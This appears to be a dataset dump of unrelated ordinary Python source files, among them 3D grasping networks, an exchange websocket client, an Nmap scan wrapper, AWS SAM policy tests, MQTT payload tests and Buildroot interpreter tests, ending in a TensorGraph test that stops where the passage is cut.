id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
11519890
|
from builtins import super
from functools import partial
import torch
import torch.nn as nn
import torch.nn.functional as F
from scipy import ndimage
from vgn.ConvONets.conv_onet.config import get_model
def get_network(name):
models = {
"vgn": ConvNet,
"giga_aff": GIGAAff,
"giga": GIGA,
"giga_geo": GIGAGeo,
"giga_detach": GIGADetach,
}
return models[name.lower()]()
def load_network(path, device, model_type=None):
"""Construct the neural network and load parameters from the specified file.
Args:
path: Path to the model parameters. The name must conform to `vgn_name_[_...]`.
"""
if model_type is None:
model_name = '_'.join(path.stem.split("_")[1:-1])
else:
model_name = model_type
print(f'Loading [{model_type}] model from {path}')
net = get_network(model_name).to(device)
net.load_state_dict(torch.load(path, map_location=device))
return net
def conv(in_channels, out_channels, kernel_size):
return nn.Conv3d(in_channels, out_channels, kernel_size, padding=kernel_size // 2)
def conv_stride(in_channels, out_channels, kernel_size):
return nn.Conv3d(
in_channels, out_channels, kernel_size, stride=2, padding=kernel_size // 2
)
class ConvNet(nn.Module):
def __init__(self):
super().__init__()
self.encoder = Encoder(1, [16, 32, 64], [5, 3, 3])
self.decoder = Decoder(64, [64, 32, 16], [3, 3, 5])
self.conv_qual = conv(16, 1, 5)
self.conv_rot = conv(16, 4, 5)
self.conv_width = conv(16, 1, 5)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
qual_out = torch.sigmoid(self.conv_qual(x))
rot_out = F.normalize(self.conv_rot(x), dim=1)
width_out = self.conv_width(x)
return qual_out, rot_out, width_out
def GIGAAff():
config = {
'encoder': 'voxel_simple_local',
'encoder_kwargs': {
'plane_type': ['xz', 'xy', 'yz'],
'plane_resolution': 40,
'unet': True,
'unet_kwargs': {
'depth': 3,
'merge_mode': 'concat',
'start_filts': 32
}
},
'decoder': 'simple_local',
'decoder_tsdf': False,
'decoder_kwargs': {
'dim': 3,
'sample_mode': 'bilinear',
'hidden_size': 32,
'concat_feat': True
},
'padding': 0,
'c_dim': 32
}
return get_model(config)
def GIGA():
config = {
'encoder': 'voxel_simple_local',
'encoder_kwargs': {
'plane_type': ['xz', 'xy', 'yz'],
'plane_resolution': 40,
'unet': True,
'unet_kwargs': {
'depth': 3,
'merge_mode': 'concat',
'start_filts': 32
}
},
'decoder': 'simple_local',
'decoder_tsdf': True,
'decoder_kwargs': {
'dim': 3,
'sample_mode': 'bilinear',
'hidden_size': 32,
'concat_feat': True
},
'padding': 0,
'c_dim': 32
}
return get_model(config)
def GIGAGeo():
config = {
'encoder': 'voxel_simple_local',
'encoder_kwargs': {
'plane_type': ['xz', 'xy', 'yz'],
'plane_resolution': 40,
'unet': True,
'unet_kwargs': {
'depth': 3,
'merge_mode': 'concat',
'start_filts': 32
}
},
'decoder': 'simple_local',
'decoder_tsdf': True,
'tsdf_only': True,
'decoder_kwargs': {
'dim': 3,
'sample_mode': 'bilinear',
'hidden_size': 32,
'concat_feat': True
},
'padding': 0,
'c_dim': 32
}
return get_model(config)
def GIGADetach():
config = {
'encoder': 'voxel_simple_local',
'encoder_kwargs': {
'plane_type': ['xz', 'xy', 'yz'],
'plane_resolution': 40,
'unet': True,
'unet_kwargs': {
'depth': 3,
'merge_mode': 'concat',
'start_filts': 32
}
},
'decoder': 'simple_local',
'decoder_tsdf': True,
'detach_tsdf': True,
'decoder_kwargs': {
'dim': 3,
'sample_mode': 'bilinear',
'hidden_size': 32,
'concat_feat': True
},
'padding': 0,
'c_dim': 32
}
return get_model(config)
class Encoder(nn.Module):
def __init__(self, in_channels, filters, kernels):
super().__init__()
self.conv1 = conv_stride(in_channels, filters[0], kernels[0])
self.conv2 = conv_stride(filters[0], filters[1], kernels[1])
self.conv3 = conv_stride(filters[1], filters[2], kernels[2])
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.conv3(x)
x = F.relu(x)
return x
class Decoder(nn.Module):
def __init__(self, in_channels, filters, kernels):
super().__init__()
self.conv1 = conv(in_channels, filters[0], kernels[0])
self.conv2 = conv(filters[0], filters[1], kernels[1])
self.conv3 = conv(filters[1], filters[2], kernels[2])
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = F.interpolate(x, 10)
x = self.conv2(x)
x = F.relu(x)
x = F.interpolate(x, 20)
x = self.conv3(x)
x = F.relu(x)
x = F.interpolate(x, 40)
return x
# Resnet Blocks
class ResnetBlockFC(nn.Module):
''' Fully connected ResNet Block class.
Args:
size_in (int): input dimension
size_out (int): output dimension
size_h (int): hidden dimension
'''
def __init__(self, size_in, size_out=None, size_h=None):
super().__init__()
# Attributes
if size_out is None:
size_out = size_in
if size_h is None:
size_h = min(size_in, size_out)
self.size_in = size_in
self.size_h = size_h
self.size_out = size_out
# Submodules
self.fc_0 = nn.Linear(size_in, size_h)
self.fc_1 = nn.Linear(size_h, size_out)
self.actvn = nn.ReLU()
if size_in == size_out:
self.shortcut = None
else:
self.shortcut = nn.Linear(size_in, size_out, bias=False)
# Initialization
nn.init.zeros_(self.fc_1.weight)
def forward(self, x):
net = self.fc_0(self.actvn(x))
dx = self.fc_1(self.actvn(net))
if self.shortcut is not None:
x_s = self.shortcut(x)
else:
x_s = x
return x_s + dx
def count_num_trainable_parameters(net):
return sum(p.numel() for p in net.parameters() if p.requires_grad)
|
11519970
|
import os
import sys
import time
import signal
from models.exchange.binance import WebSocketClient as BWebSocketClient
def cls():
os.system("cls" if os.name == "nt" else "clear")
def signal_handler(signum, frame):
if signum == 2:
print(" -> not finished yet!")
return
try:
websocket = BWebSocketClient(["BTCUSDT"], "1m")
websocket.start()
message_count = 0
while True:
if websocket:
if (
message_count != websocket.message_count
and websocket.tickers is not None
):
cls()
print(f"Start time: {websocket.getStartTime()}")
print(f"Time elapsed: {websocket.getTimeElapsed()} seconds")
print("\nMessageCount =", "%i \n" % websocket.message_count)
print(websocket.tickers)
message_count = websocket.message_count
time.sleep(5) # output every 5 seconds, websocket is realtime
# catches a keyboard break of app, exits gracefully
except KeyboardInterrupt:
signal.signal(signal.SIGINT, signal_handler)
print("\nPlease wait while threads complete gracefully.")
websocket.close()
sys.exit(0)
|
11519975
|
from CoreUtils.NmapAPI import Nmapper
def Port_Scan(target, port, scan_type):
nmapper = Nmapper()
nmapper.Scan(target, port, scan_type)
|
11520027
|
import sys
import numpy as np
import pandas as pd
from scipy import sparse
import itertools
import os
import CoEmbedding
DATA_DIR = '/media/O_o/UB/research/dataset/20newsgroups/CoEmbedding/'
dwmatrix_pt = DATA_DIR+'dw_matrix.csv'
vocab_pt = DATA_DIR+'vocab.txt'
n_docs = 18827
n_words = 20678
def tfidf(D, normalize=True):
tf = D.toarray()
tf[tf>0] = 1
idf = np.sum(tf, axis=0, keepdims=True)
idf = np.log(n_docs/idf)
if normalize:
D.data = np.log(D.data)+1
tf = D.toarray()
return sparse.csr_matrix(tf*idf)
#load matrix D
tp = pd.read_csv(dwmatrix_pt)
rows, cols = np.array(tp['doc_id']), np.array(tp['word_id'])
matrixD = sparse.csr_matrix((np.ones_like(rows), (rows, cols)), dtype=np.int16, shape=(n_docs, n_words))
matrixD = tfidf(matrixD, normalize=True)
#load matrix W
data = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_data.npy'))
indices = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_indices.npy'))
indptr = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_indptr.npy'))
matrixW = sparse.csr_matrix((data, indices, indptr), shape=(n_words, n_words))
#see the sparseness
print(matrixD.shape, matrixW.shape)
print(float(matrixD.nnz) / np.prod(matrixD.shape))
print(float(matrixW.nnz) / np.prod(matrixW.shape))
def get_row(Y, i):
lo, hi = Y.indptr[i], Y.indptr[i + 1]
return lo, hi, Y.data[lo:hi], Y.indices[lo:hi]
count = np.asarray(matrixW.sum(axis=1)).ravel()
n_pairs = matrixW.data.sum()
#constructing the SPPMI matrix
M = matrixW.copy()
for i in range(n_words):
lo, hi, d, idx = get_row(M, i)
M.data[lo:hi] = np.log(d * n_pairs / (count[i] * count[idx]))
#M.data[lo:hi] = (n_pairs*d)/(count[idx]*n_words)
print(max(M.data))
print(M[0,0])
M.data[M.data < 0] = 0
M.eliminate_zeros()
print(float(M.nnz) / np.prod(M.shape))
#Now $M$ is the PPMI matrix. Depending on the number of negative examples $k$, we can obtain the shifted PPMI matrix as $\max(M_{wc} - \log k, 0)$
# number of negative samples
k_ns = 1
M_ns = M.copy()
if k_ns > 1:
offset = np.log(k_ns)
else:
offset = 0.
M_ns.data -= offset
M_ns.data[M_ns.data < 0] = 0
M_ns.eliminate_zeros()
print(np.sum(np.absolute(M_ns))/np.prod(M_ns.shape))
#start training
n_embeddings = 50
max_iter = 20
n_jobs = 8
c0 = 1
c1 = 1
K = 20
lam_sparse_d = 1e-2
lam_sparse = 1e-7
lam_d = 0.5
lam_w = 1
lam_t = 50
save_dir = os.path.join(DATA_DIR, 'results_parallel')
wukong = CoEmbedding.CoEmbedding(n_embeddings=n_embeddings, K=K, max_iter=max_iter, batch_size=1000, init_std=0.01, n_jobs=n_jobs,
random_state=98765, save_params=True, save_dir=save_dir, verbose=True,
lam_sparse_d=lam_sparse_d, lam_sparse=lam_sparse, lam_d=lam_d, lam_w=lam_w, lam_t=lam_t, c0=c0, c1=c1)
wukong.fit(matrixD, M_ns, vocab_pt)
#print(wukong.alpha)
#print(wukong.beta)
#print(wukong.gamma)
topicfile = DATA_DIR + 'topicmodeling/ourtwords.txt'
topicembeddingfile = DATA_DIR + 'topicmodeling/ourtembeddings.txt'
np.savetxt(topicembeddingfile, wukong.alpha)
print(wukong.show_save_topics(10, topicfile))
print(wukong.topic_similarity())
print(wukong.most_similar('car', 15))
print(wukong.most_similar('hockey', 15))
print(wukong.most_similar('israel', 15))
print(wukong.most_similar('jesus', 15))
|
11520029
|
from typing import TYPE_CHECKING
from itests.pages.base import BasePage
if TYPE_CHECKING:
from selenium.webdriver.remote.webelement import WebElement
from typing import List
class PermissionCreatePage(BasePage):
@property
def allowed_patterns(self):
# type: () -> List[str]
patterns = self.find_element_by_id("allowed-patterns")
return [e.text for e in patterns.find_elements_by_tag_name("strong")]
@property
def form(self):
# type: () -> WebElement
return self.find_element_by_id("permission-create-form")
def set_description(self, description):
# type: (str) -> None
field = self.form.find_element_by_name("description")
field.send_keys(description)
def set_name(self, name):
# type: (str) -> None
field = self.form.find_element_by_name("name")
field.send_keys(name)
|
11520047
|
from django.db import models
from django.http import Http404
from wagtail.core.models import Page
from wagtail.core.fields import RichTextField
from wagtail.admin.edit_handlers import FieldPanel
class HomePage(Page):
body = RichTextField(blank=True)
def route(self, request, path_components):
# Check the request is for AMP page
is_amp_request = False
if path_components and path_components[0] == 'amp':
is_amp_request = True
# Remove the amp from path components to check if the page exist
path_components = path_components[1:]
page, args, kwargs = super(HomePage, self).route(
request, path_components
)
if is_amp_request:
# If the page has amp template serve it otherwise raise 404
if hasattr(page, 'get_template_amp'):
kwargs['is_amp_request'] = is_amp_request
else:
raise Http404
return page, args, kwargs
content_panels = Page.content_panels + [
FieldPanel('body', classname="full"),
]
parent_page_types = ['wagtailcore.Page']
|
11520092
|
from cloudfn.pubsub import handle_pubsub_event
import jsonpickle
def pubsub_handler(message):
print jsonpickle.encode(message)
handle_pubsub_event(pubsub_handler)
|
11520101
|
from mock import Mock, patch
from unittest import TestCase
from samtranslator.model.function_policies import FunctionPolicies, PolicyTypes, PolicyEntry
from samtranslator.model.exceptions import InvalidTemplateException
class TestFunctionPolicies(TestCase):
def setUp(self):
self.policy_template_processor_mock = Mock()
self.is_policy_template_mock = Mock()
self.function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.function_policies._is_policy_template = self.is_policy_template_mock
@patch.object(FunctionPolicies, "_get_policies")
def test_initialization_must_ingest_policies_from_resource_properties(self, get_policies_mock):
resource_properties = {}
dummy_policy_results = ["some", "policy", "statements"]
expected_length = 3
get_policies_mock.return_value = dummy_policy_results
function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)
get_policies_mock.assert_called_once_with(resource_properties)
self.assertEqual(expected_length, len(function_policies))
@patch.object(FunctionPolicies, "_get_policies")
def test_get_must_yield_results_on_every_call(self, get_policies_mock):
resource_properties = {} # Just some input
dummy_policy_results = ["some", "policy", "statements"]
expected_results = ["some", "policy", "statements"]
# Setup _get_policies to return these dummy values for testing
get_policies_mock.return_value = dummy_policy_results
function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)
# `list()` will implicitly call the `get()` repeatedly because it is a generator
self.assertEqual(list(function_policies.get()), expected_results)
@patch.object(FunctionPolicies, "_get_policies")
def test_get_must_yield_no_results_with_no_policies(self, get_policies_mock):
resource_properties = {} # Just some input
dummy_policy_results = []
expected_result = []
# Setup _get_policies to return these dummy values for testing
get_policies_mock.return_value = dummy_policy_results
function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)
# `list()` will implicitly call the `get()` repeatedly because it is a generator
self.assertEqual(list(function_policies.get()), expected_result)
def test_contains_policies_must_work_for_valid_input(self):
resource_properties = {"Policies": "some managed policy"}
self.assertTrue(self.function_policies._contains_policies(resource_properties))
def test_contains_policies_must_ignore_resources_without_policies(self):
resource_properties = {"some key": "value"}
self.assertFalse(self.function_policies._contains_policies(resource_properties))
def test_contains_policies_must_ignore_non_dict_resources(self):
resource_properties = "some value"
self.assertFalse(self.function_policies._contains_policies(resource_properties))
def test_contains_policies_must_ignore_none_resources(self):
resource_properties = None
self.assertFalse(self.function_policies._contains_policies(resource_properties))
def test_contains_policies_must_ignore_lowercase_property_name(self):
# Property names are case sensitive
resource_properties = {"policies": "some managed policy"}
self.assertFalse(self.function_policies._contains_policies(resource_properties))
def test_get_type_must_work_for_managed_policy(self):
policy = "managed policy is a string"
expected = PolicyTypes.MANAGED_POLICY
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
@patch("samtranslator.model.function_policies.is_intrinsic")
def test_get_type_must_work_for_managed_policy_with_intrinsics(self, is_intrinsic_mock):
policy = {"Ref": "somevalue"}
expected = PolicyTypes.MANAGED_POLICY
is_intrinsic_mock.return_value = True
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
def test_get_type_must_work_for_policy_statements(self):
policy = {"Statement": "policy statements have a 'Statement' key"}
expected = PolicyTypes.POLICY_STATEMENT
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
def test_get_type_must_work_for_policy_templates(self):
policy = {"PolicyTemplate": "some template"}
self.is_policy_template_mock.return_value = True
expected = PolicyTypes.POLICY_TEMPLATE
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
def test_get_type_must_ignore_invalid_policy(self):
policy = {"not-sure-what-this-is": "value"}
# This is also not a policy template
self.is_policy_template_mock.return_value = False
expected = PolicyTypes.UNKNOWN
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
def test_get_type_must_ignore_invalid_policy_value_list(self):
policy = ["invalid", "policy"]
expected = PolicyTypes.UNKNOWN
self.is_policy_template_mock.return_value = False
result = self.function_policies._get_type(policy)
self.assertEqual(result, expected)
self.is_policy_template_mock.assert_called_once_with(policy)
def test_get_policies_must_return_all_policies(self):
policies = [
"managed policy 1",
{"Ref": "some managed policy"},
{"Statement": "policy statement"},
{"PolicyTemplate": "some value"},
["unknown", "policy"],
]
resource_properties = {"Policies": policies}
self.is_policy_template_mock.side_effect = [True, False] # Return True for policy template, False for the list
expected = [
PolicyEntry(data="managed policy 1", type=PolicyTypes.MANAGED_POLICY),
PolicyEntry(data={"Ref": "some managed policy"}, type=PolicyTypes.MANAGED_POLICY),
PolicyEntry(data={"Statement": "policy statement"}, type=PolicyTypes.POLICY_STATEMENT),
PolicyEntry(data={"PolicyTemplate": "some value"}, type=PolicyTypes.POLICY_TEMPLATE),
PolicyEntry(data=["unknown", "policy"], type=PolicyTypes.UNKNOWN),
]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_ignore_if_resource_does_not_contain_policy(self):
resource_properties = {}
expected = []
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_ignore_if_policies_is_empty(self):
resource_properties = {"Policies": []}
expected = []
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_work_for_single_policy_string(self):
resource_properties = {"Policies": "single managed policy"}
expected = [PolicyEntry(data="single managed policy", type=PolicyTypes.MANAGED_POLICY)]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_work_for_single_dict_with_managed_policy_intrinsic(self):
resource_properties = {"Policies": {"Ref": "some managed policy"}}
expected = [PolicyEntry(data={"Ref": "some managed policy"}, type=PolicyTypes.MANAGED_POLICY)]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_work_for_single_dict_with_policy_statement(self):
resource_properties = {"Policies": {"Statement": "some policy statement"}}
expected = [PolicyEntry(data={"Statement": "some policy statement"}, type=PolicyTypes.POLICY_STATEMENT)]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_get_policies_must_work_for_single_dict_of_policy_template(self):
resource_properties = {"Policies": {"PolicyTemplate": "some template"}}
self.is_policy_template_mock.return_value = True
expected = [PolicyEntry(data={"PolicyTemplate": "some template"}, type=PolicyTypes.POLICY_TEMPLATE)]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
self.is_policy_template_mock.assert_called_once_with(resource_properties["Policies"])
def test_get_policies_must_work_for_single_dict_of_invalid_policy_template(self):
resource_properties = {"Policies": {"InvalidPolicyTemplate": "some template"}}
self.is_policy_template_mock.return_value = False # Invalid policy template
expected = [PolicyEntry(data={"InvalidPolicyTemplate": "some template"}, type=PolicyTypes.UNKNOWN)]
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
self.is_policy_template_mock.assert_called_once_with({"InvalidPolicyTemplate": "some template"})
def test_get_policies_must_work_for_unknown_policy_types(self):
resource_properties = {"Policies": [1, 2, 3]}
expected = [
PolicyEntry(data=1, type=PolicyTypes.UNKNOWN),
PolicyEntry(data=2, type=PolicyTypes.UNKNOWN),
PolicyEntry(data=3, type=PolicyTypes.UNKNOWN),
]
self.is_policy_template_mock.return_value = False
result = self.function_policies._get_policies(resource_properties)
self.assertEqual(result, expected)
def test_is_policy_template_must_detect_valid_policy_templates(self):
template_name = "template_name"
policy = {template_name: {"Param1": "foo"}}
self.policy_template_processor_mock.has.return_value = True
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertTrue(function_policies._is_policy_template(policy))
self.policy_template_processor_mock.has.assert_called_once_with(template_name)
def test_is_policy_template_must_ignore_non_dict_policies(self):
policy = [1, 2, 3]
self.policy_template_processor_mock.has.return_value = True
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertFalse(function_policies._is_policy_template(policy))
self.policy_template_processor_mock.has.assert_not_called()
def test_is_policy_template_must_ignore_none_policies(self):
policy = None
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertFalse(function_policies._is_policy_template(policy))
def test_is_policy_template_must_ignore_dict_with_two_keys(self):
template_name = "template_name"
policy = {template_name: {"param1": "foo"}, "A": "B"}
self.policy_template_processor_mock.has.return_value = True
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertFalse(function_policies._is_policy_template(policy))
def test_is_policy_template_must_ignore_non_policy_templates(self):
template_name = "template_name"
policy = {template_name: {"param1": "foo"}}
self.policy_template_processor_mock.has.return_value = False
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertFalse(function_policies._is_policy_template(policy))
self.policy_template_processor_mock.has.assert_called_once_with(template_name)
def test_is_policy_template_must_return_false_without_the_processor(self):
policy = {"template_name": {"param1": "foo"}}
function_policies_obj = FunctionPolicies({}, None) # No policy template processor
self.assertFalse(function_policies_obj._is_policy_template(policy))
self.policy_template_processor_mock.has.assert_not_called()
def test_get_type_with_intrinsic_if_must_return_managed_policy_type(self):
managed_policy = {"Fn::If": ["SomeCondition", "some managed policy arn", "other managed policy arn"]}
no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, "other managed policy arn"]}
no_value_else = {"Fn::If": ["SomeCondition", "other managed policy arn", {"Ref": "AWS::NoValue"}]}
expected_managed_policy = PolicyTypes.MANAGED_POLICY
self.assertTrue(expected_managed_policy, self.function_policies._get_type(managed_policy))
self.assertTrue(expected_managed_policy, self.function_policies._get_type(no_value_if))
self.assertTrue(expected_managed_policy, self.function_policies._get_type(no_value_else))
def test_get_type_with_intrinsic_if_must_return_policy_statement_type(self):
policy_statement = {
"Fn::If": ["SomeCondition", {"Statement": "then statement"}, {"Statement": "else statement"}]
}
no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, {"Statement": "else statement"}]}
no_value_else = {"Fn::If": ["SomeCondition", {"Statement": "then statement"}, {"Ref": "AWS::NoValue"}]}
expected_managed_policy = PolicyTypes.POLICY_STATEMENT
self.assertTrue(expected_managed_policy, self.function_policies._get_type(policy_statement))
self.assertTrue(expected_managed_policy, self.function_policies._get_type(no_value_if))
self.assertTrue(expected_managed_policy, self.function_policies._get_type(no_value_else))
def test_get_type_with_intrinsic_if_must_return_policy_template_type(self):
policy_template = {
"Fn::If": [
"SomeCondition",
{"template_name_one": {"Param1": "foo"}},
{"template_name_one": {"Param1": "foo"}},
]
}
no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, {"template_name_one": {"Param1": "foo"}}]}
no_value_else = {"Fn::If": ["SomeCondition", {"template_name_one": {"Param1": "foo"}}, {"Ref": "AWS::NoValue"}]}
expected_managed_policy = PolicyTypes.POLICY_TEMPLATE
self.policy_template_processor_mock.has.return_value = True
function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
self.assertTrue(expected_managed_policy, function_policies._get_type(policy_template))
self.assertTrue(expected_managed_policy, function_policies._get_type(no_value_if))
self.assertTrue(expected_managed_policy, function_policies._get_type(no_value_else))
def test_get_type_with_intrinsic_if_must_raise_exception_for_bad_policy(self):
policy_too_few_values = {"Fn::If": ["condition", "then"]}
policy_too_many_values = {"Fn::If": ["condition", "then", "else", "extra"]}
self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_too_few_values)
self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_too_many_values)
def test_get_type_with_intrinsic_if_must_raise_exception_for_different_policy_types(self):
policy_one = {"Fn::If": ["condition", "then", {"Statement": "else"}]}
policy_two = {"Fn::If": ["condition", {"Statement": "then"}, "else"]}
self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_one)
self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_two)
|
11520114
|
import logging
from rocketchat.calls.base import RocketChatBase
logger = logging.getLogger(__name__)
class GetUsers(RocketChatBase):
endpoint = '/api/v1/users.list'
def build_endpoint(self):
return self.endpoint
def post_response(self, result):
users = []
try:
_users = result.get('users')
for user in _users:
user_dict = dict()
user_dict['name'] = user.get('name')
user_dict['emails'] = [email['address'] for email in user.get('emails')]
user_dict['username'] = user.get('username')
user_dict['type'] = user.get('type')
user_dict['status'] = user.get('status')
user_dict['roles'] = user.get('roles')
user_dict['id'] = user.get('_id')
users.append(user_dict)
except Exception as e:
logger.error('Exception in fetching public rooms {e}'.format(
e=e
), exc_info=True)
return users
|
11520120
|
from ucollections import deque
d = deque((), 1)
d.append(1)
d.append(2)
assert d.popleft() == 2
d = deque((), 1, 1)
d.append(1)
try:
d.append(2)
assert False
except IndexError:
pass
|
11520130
|
import pytest
from paho.mqtt.client import MQTTMessage
from HABApp.mqtt.mqtt_payload import get_msg_payload
@pytest.mark.parametrize(
'payload, expected', (
('none', None),
('None', None),
('true', True),
('True', True),
('false', False),
('False', False),
('1', 1),
('-1', -1),
('0.1', 0.1),
('-0.1', -0.1),
('asdf', 'asdf'),
('[asdf]', '[asdf]'),
(b'\x07\x07', '\x07\x07'),
)
)
def test_value_cast(payload, expected):
msg = MQTTMessage(topic=b'test_topic')
msg.payload = payload.encode('utf-8') if not isinstance(payload, bytes) else payload
assert get_msg_payload(msg) == ('test_topic', expected)
|
11520131
|
import os
import infra.basetest
class TestPythonBase(infra.basetest.BRTest):
config = infra.basetest.BASIC_TOOLCHAIN_CONFIG + \
"""
BR2_TARGET_ROOTFS_CPIO=y
# BR2_TARGET_ROOTFS_TAR is not set
"""
interpreter = "python"
def login(self):
cpio_file = os.path.join(self.builddir, "images", "rootfs.cpio")
self.emulator.boot(arch="armv5",
kernel="builtin",
options=["-initrd", cpio_file])
self.emulator.login()
def version_test(self, version, timeout=-1):
cmd = self.interpreter + " --version 2>&1 | grep '^{}'".format(version)
_, exit_code = self.emulator.run(cmd, timeout)
self.assertEqual(exit_code, 0)
def math_floor_test(self, timeout=-1):
cmd = self.interpreter + " -c 'import math; math.floor(12.3)'"
_, exit_code = self.emulator.run(cmd, timeout)
self.assertEqual(exit_code, 0)
def libc_time_test(self, timeout=-1):
cmd = self.interpreter + " -c 'from __future__ import print_function;"
cmd += "import ctypes;"
cmd += "libc = ctypes.cdll.LoadLibrary(\"libc.so.1\");"
cmd += "print(libc.time(None))'"
_, exit_code = self.emulator.run(cmd, timeout)
self.assertEqual(exit_code, 0)
def zlib_test(self, timeout=-1):
cmd = self.interpreter + " -c 'import zlib'"
_, exit_code = self.emulator.run(cmd, timeout)
self.assertEqual(exit_code, 1)
class TestPython2(TestPythonBase):
config = TestPythonBase.config + \
"""
BR2_PACKAGE_PYTHON=y
"""
def test_run(self):
self.login()
self.version_test("Python 2")
self.math_floor_test()
self.libc_time_test()
self.zlib_test()
class TestPython3(TestPythonBase):
config = TestPythonBase.config + \
"""
BR2_PACKAGE_PYTHON3=y
"""
def test_run(self):
self.login()
self.version_test("Python 3")
self.math_floor_test()
self.libc_time_test()
self.zlib_test()
class TestPythonPackageBase(TestPythonBase):
"""Common class to test a python package.
Build an image containing the scripts listed in sample_scripts, start the
emulator, login to it and for each sample script in the image run the python
interpreter passing the name of the script and check the status code is 0.
Each test case that inherits from this class must have:
__test__ = True - to let nose2 know that it is a test case
config - defconfig fragment with the packages to run the test
It also can have:
sample_scripts - list of scripts to add to the image and run on the target
timeout - timeout to the script to run when the default from the
test infra is not enough
When custom commands need be issued on the target the method
run_sample_scripts can be overridden.
"""
__test__ = False
config_sample_scripts = \
"""
BR2_ROOTFS_POST_BUILD_SCRIPT="{}"
BR2_ROOTFS_POST_SCRIPT_ARGS="{}"
""".format(infra.filepath("tests/package/copy-sample-script-to-target.sh"),
"{sample_scripts}")
sample_scripts = None
timeout = -1
def __init__(self, names):
"""Add the scripts to the target in build time."""
super(TestPythonPackageBase, self).__init__(names)
if self.sample_scripts:
scripts = [infra.filepath(s) for s in self.sample_scripts]
self.config += self.config_sample_scripts.format(sample_scripts=" ".join(scripts))
def check_sample_scripts_exist(self):
"""Check the scripts were really added to the image."""
scripts = [os.path.basename(s) for s in self.sample_scripts]
cmd = "md5sum " + " ".join(scripts)
_, exit_code = self.emulator.run(cmd)
self.assertEqual(exit_code, 0)
def run_sample_scripts(self):
"""Run each script previously added to the image."""
for script in self.sample_scripts:
cmd = self.interpreter + " " + os.path.basename(script)
_, exit_code = self.emulator.run(cmd, timeout=self.timeout)
self.assertEqual(exit_code, 0)
def test_run(self):
self.login()
self.check_sample_scripts_exist()
self.run_sample_scripts()
|
11520149
|
from showml.losses import BinaryCrossEntropy
from showml.optimizers import RMSProp
from showml.linear_model.regression import LogisticRegression
from showml.utils.dataset import Dataset
from showml.losses.metrics import accuracy, binary_cross_entropy
from showml.utils.data_loader import load_wine
X_train, y_train = load_wine()
dataset = Dataset(X_train, y_train)
model = LogisticRegression()
optimizer = RMSProp()
model.compile(
optimizer=optimizer,
loss=BinaryCrossEntropy(),
metrics=[binary_cross_entropy, accuracy],
)
model.fit(dataset, batch_size=64, epochs=2000)
model.plot_metrics()
|
11520178
|
import asyncio
class Streams:
def __init__(self):
self.inbox = asyncio.Queue()
self.outbox = asyncio.Queue()
|
11520182
|
import tvm
import time
import numpy as np
import torch
import random
from tvm.tensor_graph.testing.models import capsule_tg as capsule
from tvm.tensor_graph.testing.pytorch_examples import resnet_annotated
from tvm.tensor_graph.nn.layers import Layer, Conv2d, BatchNorm2d, ReLU, \
AvgPool2d, GlobalAvgPool2d, Linear, Sequential
from tvm.tensor_graph.core import ForwardGraph, BackwardGraph, compute, \
GraphTensor, GraphOp, PyTIRGraph
from tvm.tensor_graph.nn import MarginLoss, SGD
from tvm.tensor_graph.core.schedule_generator import ConnectedSet, GPUScheduleBaseSet, \
GPUScheduleMasterBaseSet, form_connected_sets, GPUScheduleMasterSet, \
SingleCut, form_cut_candidates, LayoutTransform
from tvm.tensor_graph.core.utils import flatten_tir_graph
from tvm.tensor_graph.core.space import PrimitiveSpace, PartitionSpace, ForwardGraphSpace
from tvm.tensor_graph.core.tuner import RandomPrimitiveTuner, RandomPartitionTuner, RandomForwardTuner
batch = 21
num_cap = 33
channel = 1
hw = 28
img_shape = [batch, channel, hw, hw]
num_classes = 10
label_shape = [batch, num_classes]
def test1():
print("test 1 ##############################")
model = capsule.get_model(batch, num_cap)
print("The parameters in capsule")
for w in model.weights():
print(w)
def test2():
print("test 2 ##############################")
dtype = "float32"
img_tensor = GraphTensor(img_shape, dtype=dtype, name="image")
label_tensor = GraphTensor(label_shape, dtype=dtype, name="label")
model = capsule.get_model(batch, num_cap)
# get output_tensor
output_tensor = model(img_tensor)
# get the weights tensors
weights_tensors = []
for w in model.weights():
weights_tensors.append(w)
print(w.shape)
print("len(weights_tensors):", len(weights_tensors))
# this is data
img_np = np.random.uniform(-1, 1, img_shape).astype(dtype)
random_onehot_label = []
